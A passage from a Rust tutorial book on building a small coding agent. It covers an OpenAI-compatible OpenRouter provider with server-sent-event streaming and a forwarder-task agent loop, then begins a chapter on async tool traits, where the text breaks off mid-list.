  • Implement OpenRouterProvider so the agent can talk to a real OpenAI-compatible API — both non-streaming and streaming.
  • Implement StreamingAgent::chat — the agent loop that forwards streaming text deltas to a UI channel while running tools.

Chapter 5a built the abstractions (Provider, StreamProvider, StreamEvent), the mocks (MockProvider, MockStreamProvider), and the parse/accumulate machinery (parse_sse_line, StreamAccumulator). This chapter plugs those pieces into a real HTTP provider and wires a streaming channel through the agent loop.

Wherever the code below uses parse_sse_line or StreamAccumulator, it is leaning on the implementations you wrote in 5a.

If Go is your native async language, here is the translation table you need before reading the streaming code. Everything in this chapter rests on these primitives; skip this box if you already think in tokio.

Go → Tokio translation table:

  • go func() { ... }() → tokio::spawn(async { ... }). Both are fire-and-forget; tokio::spawn additionally returns a JoinHandle you can await later if you care about the result.
  • ch := make(chan T, n) → let (tx, rx) = tokio::sync::mpsc::channel::<T>(n). Bounded channel. For the unbounded analogue -- a channel with infinite buffer -- use mpsc::unbounded_channel().
  • ch <- v → tx.send(v).await. Sends are async in Tokio (they await when the buffer is full). The unbounded variant is tx.send(v) with no .await.
  • v, ok := <-ch → while let Some(v) = rx.recv().await { ... }. recv returns None when all senders are dropped (equivalent to close(ch) plus draining).
  • close(ch) → drop every tx clone. Tokio has no explicit close. When the last sender is dropped, receivers see None and loops exit.
  • wg.Add(1); wg.Wait() → handle.await (or tokio::join!, try_join!). A JoinHandle is like a single-goroutine WaitGroup. For multiple handles, tokio::join!(h1, h2) runs them concurrently.
  • select { case <-a: case <-b: } → tokio::select! { _ = a => ..., _ = b => ... }. A direct analogue, except branch polling order is randomized unless you add biased;.

One non-obvious point specific to this chapter: we signal "the stream is over" by dropping the sender. There is no explicit close call. The receiver task observes rx.recv().await == None and exits its loop. If you forget to drop the sender (for example by holding it inside an Arc that outlives the producer), the receiver hangs forever -- this is one of the deadlock patterns that §"Why not just rx.recv() in the main loop?" walks through.
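The drop-to-close convention is not tokio-specific: std's synchronous channels behave the same way, which makes it easy to demo without an async runtime. A minimal sketch (std::sync::mpsc and threads standing in for tokio's mpsc and tasks):

```rust
use std::sync::mpsc;
use std::thread;

// Produce two deltas, then let the sender drop; the receiver loop exits on
// its own -- no explicit close() anywhere.
fn drop_based_close_demo() -> Vec<String> {
    let (tx, rx) = mpsc::channel::<String>();
    let producer = thread::spawn(move || {
        tx.send("delta 1".into()).unwrap();
        tx.send("delta 2".into()).unwrap();
        // `tx` is dropped when this closure returns -- that IS the close signal.
    });
    let mut received = Vec::new();
    while let Ok(v) = rx.recv() {
        // recv() returns Err once all senders are gone (tokio returns None).
        received.push(v);
    }
    producer.join().unwrap();
    received
}

fn main() {
    assert_eq!(drop_based_close_demo().len(), 2);
}
```

If the producer thread held a second clone of tx that never dropped, the while loop above would block forever -- the sync version of the deadlock described above.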


OpenRouterProvider

With the parsing infrastructure in place, we can build the real provider. It targets the OpenRouter API, which is OpenAI-compatible — the same request/response format works with OpenAI, Together, Groq, and many others.

API types

The provider needs serde types for the request and response payloads. Here is the request side:

#![allow(unused)]
fn main() {
#[derive(Serialize)]
struct ChatRequest<'a> {
    model: &'a str,
    messages: Vec<ApiMessage>,
    #[serde(skip_serializing_if = "Vec::is_empty")]
    tools: Vec<ApiTool>,
    #[serde(skip_serializing_if = "std::ops::Not::not")]
    stream: bool,
}
}

The skip_serializing_if annotations keep the JSON clean — tools is omitted when empty (some models choke on an empty array), and stream is omitted when false (the default for the API).
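Concretely, a request with no tools and stream: false serializes to just the two remaining fields (model name and message content here are illustrative):

```json
{
  "model": "some-provider/some-model",
  "messages": [
    { "role": "user", "content": "hello" }
  ]
}
```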

ApiMessage, ApiToolCall, ApiFunction, ApiTool, and ApiToolDef mirror the OpenAI message format. The response types (ChatResponse, Choice, ResponseMessage) deserialize the non-streaming response. The chunk types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) deserialize the streaming response — you already implemented those in 5a for parse_sse_line.

Conversion helpers

Two impl methods on OpenRouterProvider translate between our internal types and the API format. convert_messages handles the four Message variants:

#![allow(unused)]
fn main() {
pub(crate) fn convert_messages(messages: &[Message]) -> Vec<ApiMessage> {
    let mut out = Vec::new();
    for msg in messages {
        match msg {
            Message::System(text) => out.push(ApiMessage {
                role: "system".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::User(text) => out.push(ApiMessage {
                role: "user".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::Assistant(turn) => out.push(ApiMessage {
                role: "assistant".into(),
                content: turn.text.clone(),
                tool_calls: if turn.tool_calls.is_empty() {
                    None
                } else {
                    Some(
                        turn.tool_calls
                            .iter()
                            .map(|c| ApiToolCall {
                                id: c.id.clone(),
                                type_: "function".into(),
                                function: ApiFunction {
                                    name: c.name.clone(),
                                    arguments: c.arguments.to_string(),
                                },
                            })
                            .collect(),
                    )
                },
                tool_call_id: None,
            }),
            Message::ToolResult { id, content } => out.push(ApiMessage {
                role: "tool".into(),
                content: Some(content.clone()),
                tool_calls: None,
                tool_call_id: Some(id.clone()),
            }),
        }
    }
    out
}
}

Four details worth pausing on:

  • System and User are symmetric. Same shape, different role string. Everything else (tool_calls, tool_call_id) is None.
  • Assistant is the variant with the nuance. The text field maps directly to content, but the tool calls have to be reserialised. c.arguments is a serde_json::Value; the OpenAI API wants it as a JSON string, so we call .to_string() to turn the Value back into text. Emitting an empty tool_calls: [] array makes some providers reject the request as malformed, so we send None instead.
  • ToolResult becomes role: "tool". This is the variant that ties a result back to its originating call via tool_call_id. Without that id the provider cannot associate the result with the call, and the next response is usually an error.
  • No default branch. Every Message variant is handled explicitly. If you add a new variant in Chapter 4, the match will fail to compile here until you decide how it should serialise — which is the behaviour we want.
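To make the ToolResult pairing concrete, here is an assistant-turn-plus-tool-result pair as it would look on the wire after conversion (all values illustrative). Note that the arguments field is a JSON string, not a JSON object, and the tool message echoes the call's id:

```json
[
  {
    "role": "assistant",
    "content": null,
    "tool_calls": [
      {
        "id": "call_1",
        "type": "function",
        "function": { "name": "bash", "arguments": "{\"command\":\"ls\"}" }
      }
    ]
  },
  { "role": "tool", "tool_call_id": "call_1", "content": "Cargo.toml\nsrc" }
]
```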

convert_tools is simpler: wrap each ToolDefinition in the OpenAI function-calling envelope.

#![allow(unused)]
fn main() {
pub(crate) fn convert_tools(tools: &[&ToolDefinition]) -> Vec<ApiTool> {
    tools
        .iter()
        .map(|t| ApiTool {
            type_: "function",
            function: ApiToolDef {
                name: t.name,
                description: t.description,
                parameters: t.parameters.clone(),
            },
        })
        .collect()
}
}

The envelope is a fixed shape: { "type": "function", "function": { name, description, parameters } }. Every OpenAI-compatible provider expects exactly this, and our ToolDefinition was designed in Ch4 specifically so this mapping is a one-liner.

The provider struct

#![allow(unused)]
fn main() {
pub struct OpenRouterProvider {
    client: reqwest::Client,
    api_key: String,
    model: String,
    base_url: String,
}
}

The struct holds a reusable reqwest::Client, the API key, model name, and base URL. Constructors include new(api_key, model) for explicit creation, from_env() which loads OPENROUTER_API_KEY via dotenvy, and a base_url(self, url) builder method for overriding the endpoint (useful for local testing or alternative providers).

Non-streaming Provider impl

The non-streaming path is the simpler one: one POST, one JSON response, one AssistantTurn returned. Here it is end to end:

#![allow(unused)]
fn main() {
impl Provider for OpenRouterProvider {
    async fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: false,
        };

        let resp: ChatResponse = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?
            .json()
            .await
            .context("failed to parse response")?;

        let choice = resp.choices.into_iter().next().context("no choices")?;

        let tool_calls = choice
            .message
            .tool_calls
            .unwrap_or_default()
            .into_iter()
            .map(|tc| {
                let arguments =
                    serde_json::from_str(&tc.function.arguments).unwrap_or(Value::Null);
                ToolCall {
                    id: tc.id,
                    name: tc.function.name,
                    arguments,
                }
            })
            .collect();

        let stop_reason = match choice.finish_reason.as_deref() {
            Some("tool_calls") => StopReason::ToolUse,
            _ => StopReason::Stop,
        };

        let usage = resp.usage.map(|u| TokenUsage {
            input_tokens: u.prompt_tokens.unwrap_or(0),
            output_tokens: u.completion_tokens.unwrap_or(0),
        });

        Ok(AssistantTurn {
            text: choice.message.content,
            tool_calls,
            stop_reason,
            usage,
        })
    }
}
}

Three decisions to notice:

  • error_for_status() turns HTTP 4xx/5xx into an Err. Otherwise a 403 from OpenRouter would deserialize whatever body came back as if it were a ChatResponse and fail confusingly later.
  • Tool-call arguments arrive as a JSON string, not a Value. The OpenAI spec puts "arguments": "{\"path\":\"foo.rs\"}" in the wire format. We parse it back into a Value ourselves; on a parse failure we fall back to Value::Null so a malformed arguments field does not abort the whole turn.
  • stop_reason is a straight mapping of finish_reason. Only "tool_calls" becomes ToolUse; everything else ("stop", "length", null, missing) becomes Stop. This matches the "the model decides" story from Chapter 3's aside -- we are just translating the model's own stop signal.

Streaming StreamProvider impl

The streaming path is the same request shape with stream: true, but instead of a single JSON body we read a chunked HTTP response and parse it as Server-Sent Events. Here is the complete impl:

#![allow(unused)]
fn main() {
impl crate::streaming::StreamProvider for OpenRouterProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: tokio::sync::mpsc::UnboundedSender<crate::streaming::StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        use crate::streaming::{StreamAccumulator, parse_sse_line};

        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: true,
        };

        let mut resp = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?;

        let mut acc = StreamAccumulator::new();
        let mut buffer = String::new();

        while let Some(chunk) = resp.chunk().await.context("failed to read chunk")? {
            buffer.push_str(&String::from_utf8_lossy(&chunk));

            while let Some(newline_pos) = buffer.find('\n') {
                let line = buffer[..newline_pos].trim_end_matches('\r').to_string();
                buffer = buffer[newline_pos + 1..].to_string();

                if line.is_empty() {
                    continue;
                }

                if let Some(events) = parse_sse_line(&line) {
                    for event in events {
                        acc.feed(&event);
                        let _ = tx.send(event);
                    }
                }
            }
        }

        Ok(acc.finish())
    }
}
}

Walk through it:

  1. Same request, but stream: true. The API returns a chunked HTTP response instead of a single JSON body. The request construction and auth are identical to the non-streaming path; this is exactly what we want from an abstraction called "streaming".
  2. Read raw byte chunks. resp.chunk() returns Option<Bytes> — the HTTP body arrives in arbitrary-sized pieces that do not align with SSE event boundaries. A single chunk could be a partial line, several lines, or multiple events crammed together.
  3. Buffer and split on newlines. TCP chunks can split an SSE line in the middle. The buffer accumulates raw text, and the inner while loop extracts complete lines. This is classic line-oriented protocol parsing — you accumulate bytes and consume lines as they become available. Notice the inner loop keeps going until no more complete lines remain in the buffer, then we wait for the next chunk.
  4. Parse each line. parse_sse_line (from 5a) converts a data: line into StreamEvents. Blank lines (SSE event separators) and non-data lines (comments, keep-alives) return None and are skipped.
  5. Feed both the accumulator and the channel. For every event, the accumulator updates its internal state (building the eventual AssistantTurn) and the channel delivers the same event to the UI in real-time. The let _ = tx.send(event) deliberately discards a send error: if the receiver has been dropped (e.g. the forwarder task has exited because the main loop cancelled), we still want to finish consuming the stream so the underlying HTTP connection can be cleanly released.
  6. Return the assembled message. Once the stream ends (resp.chunk() returns None), the accumulator has collected everything, and finish() produces the final AssistantTurn. At this point tx is dropped (the function is returning), which closes the channel and signals the forwarder task to exit — exactly the termination flow the StreamingAgent section below depends on.

This dual-path design (accumulator + channel) is how Claude Code handles streaming too. The UI renders tokens as they arrive, but the agent loop sees a clean, complete response — no bespoke partial-state handling.

Your task

The OpenRouterProvider lives in src/providers/openrouter.rs. Fill in the constructor, conversion helpers, the Provider impl, and the StreamProvider impl. The required dependencies (reqwest, dotenvy) are already in Cargo.toml.


StreamingAgent

With streaming working at the provider level, we need an agent loop that benefits from it. Streaming an LLM reply out of the provider is only useful if the text reaches the user's terminal as it arrives. That wiring is StreamingAgent.

StreamingAgent is the streaming counterpart of SimpleAgent from Chapter 3:

  • SimpleAgent::chat calls provider.chat() and returns a complete AssistantTurn.
  • StreamingAgent::chat calls provider.stream_chat(), forwards text deltas to a UI channel while the LLM is still generating, and then returns the assembled response once the stream finishes.

The struct and builder look identical to SimpleAgent:

#![allow(unused)]
fn main() {
pub struct StreamingAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
}

impl<P: StreamProvider> StreamingAgent<P> {
    pub fn new(provider: P) -> Self {
        Self { provider, tools: ToolSet::new() }
    }

    pub fn tool(mut self, t: impl Tool + 'static) -> Self {
        self.tools.push(t);
        self
    }

    pub async fn run(
        &self,
        prompt: &str,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> {
        let mut messages = vec![Message::User(prompt.to_string())];
        self.chat(&mut messages, events).await
    }

    pub async fn chat(
        &self,
        messages: &mut Vec<Message>,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> { /* ... */ }
}
}

run() is a thin wrapper around chat(). The real work is chat(), and it is this chapter's most subtle piece of code.

The two channels, and the problem they solve

StreamingAgent::chat sits between two channels that speak different vocabularies:

  • Downstream (provider → agent): the provider speaks StreamEvent — raw stream fragments including TextDelta, ToolCallStart, ToolCallDelta, and Done. All the low-level grammar of a streaming LLM response.
  • Upstream (agent → UI): the UI wants AgentEvent — agent-level notifications: TextDelta for displayable text, ToolCall when a tool starts running, Done when the whole conversation finishes, Error if something blows up.

StreamingAgent::chat is the translator. It has to:

  1. Hand the provider a StreamEvent channel so the provider can send deltas into it.
  2. Concurrently pull from that channel, filter TextDeltas, and re-emit them as AgentEvent::TextDelta on the UI channel — all while the provider is still generating.
  3. Wait for the provider to return the assembled AssistantTurn.
  4. Decide: if the turn ended in Stop, emit AgentEvent::Done and return; if it ended in ToolUse, emit a ToolCall event per call, run the tools, append results, and loop.

The critical word is concurrently in step 2. We cannot recv() events after stream_chat returns — by then the generation is over and the UI has been waiting on a frozen screen. We need a separate task pulling from the stream channel while the provider is still writing into it.

The forwarder-task pattern

Here is the full chat() implementation:

#![allow(unused)]
fn main() {
pub async fn chat(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        // 1. Fresh stream channel for this turn.
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();

        // 2. Spawn a forwarder task: drain stream_rx, relay TextDeltas to `events`.
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text));
                }
            }
        });

        // 3. Kick off generation. The provider writes StreamEvents into stream_tx.
        //    Dropping stream_tx here would close the channel early — so we pass it by value.
        let turn = match self.provider.stream_chat(messages, &defs, stream_tx).await {
            Ok(t) => t,
            Err(e) => {
                let _ = events.send(AgentEvent::Error(e.to_string()));
                return Err(e);
            }
        };

        // 4. stream_chat has returned → stream_tx was dropped → forwarder sees
        //    stream_rx closed → forwarder exits. Await it to propagate any panic
        //    and ensure all deltas are flushed before we emit downstream events.
        let _ = forwarder.await;

        // 5. Now handle the assembled turn: stop or another tool round.
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let mut results = Vec::with_capacity(turn.tool_calls.len());
                for call in &turn.tool_calls {
                    let _ = events.send(AgentEvent::ToolCall {
                        name: call.name.clone(),
                        summary: tool_summary(call),
                    });
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t
                            .call(call.arguments.clone())
                            .await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }

                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
                // Loop: feed results back to the LLM.
            }
        }
    }
}
}

Step-by-step:

  1. Fresh channel per loop iteration. A new mpsc::unbounded_channel() every turn. We cannot reuse one across tool rounds — dropping stream_tx is how the forwarder knows the turn is over (see step 4). If we kept the same channel, the forwarder would never exit.

  2. Spawn the forwarder. tokio::spawn runs a task concurrently with the current one. The forwarder loops on stream_rx.recv().await, filtering StreamEvent::TextDelta into AgentEvent::TextDelta. Everything else is dropped — ToolCallStart/ToolCallDelta/Done don't show up in the UI as text. We clone the events sender before moving it into the task because we still need the original to send ToolCall/Done/Error after the forwarder exits.

  3. Call stream_chat and wait. The provider is now writing StreamEvents into stream_tx. The forwarder pulls them off as they arrive and relays text to the UI. Meanwhile the current task is blocked on the stream_chat future. Three tasks are making progress at once: the HTTP response reader, the forwarder, and (via the channel) the UI renderer.

  4. Await the forwarder. When stream_chat returns, its local copy of stream_tx is dropped. That closes the channel, which makes stream_rx.recv() return None, which ends the forwarder's while let loop. Awaiting the JoinHandle does two things: it guarantees the forwarder has flushed every last delta to the UI before we move on, and it surfaces any panic the forwarder might have hit. Forgetting this await is the classic "last few tokens go missing" bug.

  5. Dispatch on stop_reason. At this point we have a complete AssistantTurn and the UI has seen every TextDelta. If the model is done (Stop), we emit AgentEvent::Done and return. If it wants tools (ToolUse), we emit a ToolCall event per invocation (the UI uses these to show "[bash: ls]" spinners), run each tool with the same graceful-error pattern as SimpleAgent, append results to messages, and let the loop spin — which will spawn a fresh forwarder and stream_chat for the next turn.

Why not just rx.recv() in the main loop?

A single-task approach — "call stream_chat, then drain rx" — fails in one of two ways. With an unbounded channel, stream_chat does not return until the stream is fully consumed, so events pile up with nobody reading; nothing deadlocks, but nothing gets rendered until generation is over. With a bounded channel, the provider blocks on tx.send().await once the buffer fills, which blocks stream_chat, which never returns — a genuine deadlock. Either way the UI sees no tokens until the turn is over, defeating the point of streaming.

The forwarder pattern decouples the two halves: the provider's writer side and the UI's reader side both make progress independently.
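The decoupling is easiest to see without the async machinery. Below is a std-threads analogue of the forwarder pattern (threads and sync channels standing in for tokio tasks and async channels; all names and values illustrative): the producer writes one channel, a spawned forwarder relays onto the UI channel, and both termination signals are drop-based.

```rust
use std::sync::mpsc;
use std::thread;

// Returns everything the "UI" channel saw, in order.
fn forwarder_demo() -> Vec<String> {
    let (tx, rx) = mpsc::channel::<String>();       // provider -> forwarder
    let (ui_tx, ui_rx) = mpsc::channel::<String>(); // forwarder -> UI

    let forwarder = thread::spawn(move || {
        while let Ok(delta) = rx.recv() {           // exits when tx is dropped
            ui_tx.send(format!("TextDelta({delta})")).unwrap();
        }
        // ui_tx dropped here -> the UI drain below stops blocking.
    });

    let producer = thread::spawn(move || {
        for d in ["Hel", "lo"] {
            tx.send(d.to_string()).unwrap();
        }
        // tx dropped -> forwarder's recv() fails -> forwarder loop ends.
    });

    let seen: Vec<String> = ui_rx.iter().collect(); // drains until ui_tx is dropped
    producer.join().unwrap();
    forwarder.join().unwrap();
    seen
}

fn main() {
    assert_eq!(forwarder_demo(), vec!["TextDelta(Hel)", "TextDelta(lo)"]);
}
```

The two join() calls mirror the await-stream_chat-then-await-forwarder ordering in chat(): no result is inspected until every relayed delta has been flushed.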

The working pattern, end to end

Here is the same flow drawn once, after the deadlock is fixed. Four Rust tasks, three edges that matter: the provider writes tx, the forwarder pulls rx and re-emits onto events, and the main loop awaits on stream_chat's return value for control flow. Termination is purely drop-based: when stream_chat returns, it drops tx; rx.recv() then yields None; the forwarder loop exits; handle.await unblocks.

sequenceDiagram
    participant M as Main loop
    participant F as Forwarder task
    participant P as stream_chat
    participant U as UI (events rx)

    M->>M: let (tx, rx) = mpsc::unbounded_channel::<StreamEvent>()
    M->>F: tokio::spawn(forwarder(rx, events))
    M->>P: provider.stream_chat(messages, tools, tx).await
    Note over P: holds the tx sender;<br/>writes events as they arrive
    P-->>F: tx.send(TextDelta) (many)
    F-->>U: events.send(AgentEvent::TextDelta)
    P-->>F: tx.send(ToolCallStart / Delta / Done)
    F-->>U: events.send(...)
    P-->>M: returns AssistantTurn (drops tx here)
    Note over F: rx.recv() now returns None,<br/>forwarder loop exits naturally
    F-->>M: JoinHandle resolves
    M->>M: match turn.stop_reason { Stop => ..., ToolUse => ... }

Three invariants keep this alive:

  1. The provider owns the sender. Only stream_chat holds a tx — the main loop hands it over and does not keep a clone. When stream_chat returns, the last tx is dropped, which closes the channel.
  2. The forwarder owns the receiver. It runs in its own spawned task so the receiver can make progress while stream_chat is still writing. No one else calls rx.recv().
  3. The main loop awaits both. First stream_chat, then the forwarder's JoinHandle. Awaiting the handle is what prevents the main loop from leaking a half-finished forwarder into the next iteration of the agent loop.

If any one of these three breaks — a stray tx clone held by the main loop, the forwarder running inline on the main task, or the main loop skipping the handle await — you get a subtle variant of the deadlock above. This is why the pattern is worth learning once and reaching for any time you need streaming I/O bridged into a step-wise decision loop.

Your task

Fill in the StreamingAgent::chat() stub in src/streaming.rs. Use the four-step recipe: channel, forwarder, await stream_chat, await forwarder. Then the match on stop_reason is the same shape as SimpleAgent::chat.


Run the tests

cargo test -p mini-claw-code-starter test_openrouter_
cargo test -p mini-claw-code-starter test_streaming_streaming_agent_
cargo test -p mini-claw-code-starter test_streaming_stream_chat_

What these tests verify

test_openrouter_ (OpenRouterProvider):

  • test_openrouter_convert_messages — internal Message variants are converted to the correct OpenAI API format
  • test_openrouter_convert_tools — ToolDefinition values are wrapped in the OpenAI function-calling envelope

test_streaming_streaming_agent_ (StreamingAgent end-to-end against MockStreamProvider):

  • test_streaming_streaming_agent_text_response — single-turn text response; UI channel sees at least one TextDelta and a Done
  • test_streaming_streaming_agent_tool_loop — the agent runs a tool round and produces a final answer; UI channel sees a ToolCall event and a Done
  • test_streaming_streaming_agent_chat_history — chat() appends the final assistant turn to the caller-provided messages vec

test_streaming_stream_chat_ (OpenRouter streaming against a local TCP mock):

  • test_streaming_stream_chat_events_order — a scripted SSE body is parsed into events in the correct order and the assembled AssistantTurn matches

Key takeaway

StreamingAgent is where everything from 5a pays off. The provider produces StreamEvents, the forwarder task translates them into UI-level AgentEvents as they arrive, and the main loop waits on the assembled AssistantTurn to decide what to do next. Tokens hit the terminal in real time; the agent loop still sees a clean, complete message — no special-casing for streaming vs non-streaming.

The pattern — "split a complex stream into two concurrent sides, bridged by a task" — is the same one Claude Code uses in its renderer. Once you've written it once, it shows up everywhere you need to mix streaming I/O with step-wise decision-making.

In Chapter 6 we turn from providers to tools — the other half of the agent's interface with the outside world.

Check yourself


← Chapter 5a: Provider & Streaming Foundations · Contents · Chapter 6: Tool Interface →

Chapter 6: Tool Interface

File(s) to edit: none — this chapter is a conceptual walkthrough of the Tool trait. The hands-on EchoTool below is meant to be built from scratch in a scratch file (or tried in the Rust playground); the starter does not ship an echo.rs stub, and the existing test_read_* tests from Chapter 2 are unaffected by anything you do here.
Reading time: 25 min

Goal

  • Understand why the Tool trait uses #[async_trait] (object safety for heterogeneous storage) while Provider uses RPITIT (zero-cost generics).
  • Implement a concrete EchoTool that demonstrates the full tool lifecycle: schema definition, trait implementation, registration, and execution.
  • Verify that ToolSet correctly registers tools and returns their definitions for the LLM.

In the last chapter we gave our agent a voice by connecting it to an LLM provider. But a model that can only produce text is like a programmer who can only talk about code without ever touching a keyboard. In this chapter we give the agent hands.

You already defined the tool types in Chapter 4 -- ToolDefinition, Tool trait, and ToolSet. In this chapter we will understand why those types are designed the way they are, explore the critical distinction between #[async_trait] and RPITIT, and then wire everything together by implementing your first concrete tool: an EchoTool.

Tool lifecycle

flowchart LR
    A[Tool::new] -->|stores| B[ToolDefinition]
    B -->|registered in| C[ToolSet]
    C -->|definitions sent to| D[LLM]
    D -->|responds with| E[ToolCall]
    E -->|dispatched via| C
    C -->|lookup by name| F[Tool::call]
    F -->|returns| G[String result]
    G -->|wrapped as| H[Message::ToolResult]

Design context: how Claude Code models tools

Claude Code's TypeScript codebase defines tools with a generic Tool<Input, Output, Progress> type. Each tool carries a Zod schema for input validation, returns rich structured output (sometimes including React elements for terminal rendering), and can emit progress events during long-running operations. There are over 40 tools in production, each with permission metadata, cost hints, and UI integration.

We are going to keep the shape but cut the ceremony. In our Rust version:

Claude Code (TypeScript)           mini-claw-code-starter (Rust)
Tool<Input, Output, Progress>      trait Tool (no generics)
Zod schema for input               serde_json::Value + builder
Rich ToolResult<T>                 anyhow::Result<String>
React-rendered progress            (not implemented)
40+ tools with Zod validation      5 tools with JSON schema
isReadOnly, isDestructive, etc.    (not implemented -- kept minimal)

The key simplification: we drop the generic parameters and the safety/display methods. Claude Code needs <Input, Output, Progress> because each tool has a distinct strongly-typed input shape and renders different UI. We use serde_json::Value for input and String for output, which lets us store heterogeneous tools in a single collection without type erasure gymnastics.

Why two async trait styles? (#[async_trait] vs RPITIT)

This is the most important design decision in the type system, and it is worth understanding deeply. The same trade-off drives every async trait in this book -- Provider, Tool, StreamProvider, Hook, SafetyCheck. Read this section once; other chapters link back to it.

Look at the Provider trait from Chapter 4:

#![allow(unused)]
fn main() {
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
}

This uses RPITIT (return-position impl Trait in traits), a feature stabilized in Rust 1.75. The compiler generates a unique future type for each implementation. It is zero-cost and avoids boxing.

But RPITIT has a catch: it makes the trait non-object-safe. You cannot write Box<dyn Provider> because the compiler needs to know the concrete future type at compile time. That is fine for providers -- we use them as generic parameters (struct SimpleAgent<P: Provider>), so the concrete type is always known.

Tools are different. We need to store a heterogeneous collection of tools -- BashTool, ReadTool, WriteTool, all in one HashMap. That requires Box<dyn Tool>, which requires object safety. And object safety requires that async methods return a known type, not an opaque impl Future.

The #[async_trait] macro from the async-trait crate solves this by rewriting async fn call(...) into a method that returns Pin<Box<dyn Future<...> + Send + '_>>. The boxing has a small cost (one heap allocation per tool call), but tool calls involve I/O that dwarfs the allocation.

Provider: generic param P       -> RPITIT (zero-cost, not object-safe)
Tool:     stored in Box<dyn>    -> #[async_trait] (boxed future, object-safe)

This split is a deliberate design choice. If Rust stabilizes dyn async fn in the future, we could drop async_trait entirely. Until then, the two-strategy approach gives us the best of both worlds.

Note that in the MockProvider impl from Chapter 5a, we wrote async fn chat(...) directly. That works because Rust 1.75+ allows async fn in trait impls even when the trait signature uses the RPITIT form. The compiler desugars it correctly. You can do the same for Tool impls -- write async fn call(...) and the #[async_trait] macro handles the rest.
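To make the object-safety argument concrete, here is a hand-written sketch of what #[async_trait] effectively generates: the async method becomes a method returning a boxed future with a concrete type, so Box<dyn Tool> compiles. The Echo type, block_on helper, and signatures below are illustrative (std-only, no async-trait or tokio), not the starter's definitions:

```rust
use std::future::Future;
use std::pin::Pin;
use std::task::{Context, Poll, RawWaker, RawWakerVTable, Waker};

// Hand-written version of the #[async_trait] desugaring: `call` returns a
// boxed future with a concrete type, so the trait stays object-safe.
trait Tool {
    fn name(&self) -> &'static str;
    fn call<'a>(&'a self, input: String)
        -> Pin<Box<dyn Future<Output = String> + Send + 'a>>;
}

struct Echo;

impl Tool for Echo {
    fn name(&self) -> &'static str { "echo" }
    fn call<'a>(&'a self, input: String)
        -> Pin<Box<dyn Future<Output = String> + Send + 'a>> {
        Box::pin(async move { input })
    }
}

// Minimal polling loop so the example runs without an async runtime.
fn vt_clone(_: *const ()) -> RawWaker { RawWaker::new(std::ptr::null(), &VTABLE) }
fn vt_noop(_: *const ()) {}
static VTABLE: RawWakerVTable = RawWakerVTable::new(vt_clone, vt_noop, vt_noop, vt_noop);

fn block_on<F: Future>(mut fut: F) -> F::Output {
    let waker = unsafe { Waker::from_raw(RawWaker::new(std::ptr::null(), &VTABLE)) };
    let mut cx = Context::from_waker(&waker);
    // SAFETY: `fut` is a local and is never moved after being pinned.
    let mut fut = unsafe { Pin::new_unchecked(&mut fut) };
    loop {
        if let Poll::Ready(out) = fut.as_mut().poll(&mut cx) {
            return out;
        }
    }
}

fn main() {
    // Heterogeneous storage: exactly what RPITIT would forbid.
    let tools: Vec<Box<dyn Tool + Send + Sync>> = vec![Box::new(Echo)];
    let out = block_on(tools[0].call("hello".to_string()));
    assert_eq!(out, "hello");
    println!("{} -> {}", tools[0].name(), out);
}
```

If you replace the boxed return type with `-> impl Future<Output = String> + Send + 'a`, the `Vec<Box<dyn Tool>>` line stops compiling -- that is the whole trade-off in one diff.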

Decision rule: which pattern for your next trait?

The question to ask about any new async trait is "do I need to store values of this trait with different concrete types in the same collection?" That single question decides it:

                  Do you need Box<dyn MyTrait> anywhere?
                                 │
                 ┌──────────────┴───────────────┐
                 ▼                              ▼
               yes                              no
                 │                              │
                 ▼                              ▼
   #[async_trait::async_trait]          trait MyTrait {
   trait MyTrait: Send + Sync {            fn do_it(&self)
       async fn do_it(&self)                 -> impl Future<...> + Send;
         -> Result<...>;                  }
   }                                      // callers use `impl MyTrait` or
   // callers use Box<dyn MyTrait>        // generic `<T: MyTrait>` params

Concrete cues that push you toward #[async_trait]:

  • You want a Vec<Box<dyn MyTrait>>, HashMap<K, Box<dyn MyTrait>>, or similar runtime-heterogeneous container. (This is what ToolSet does.)
  • You want to return Box<dyn MyTrait> from a function because callers do not need to know the concrete type.
  • You want users to plug in new implementations at runtime (e.g. via a dynamic registry or plugin system).

Concrete cues that push you toward RPITIT:

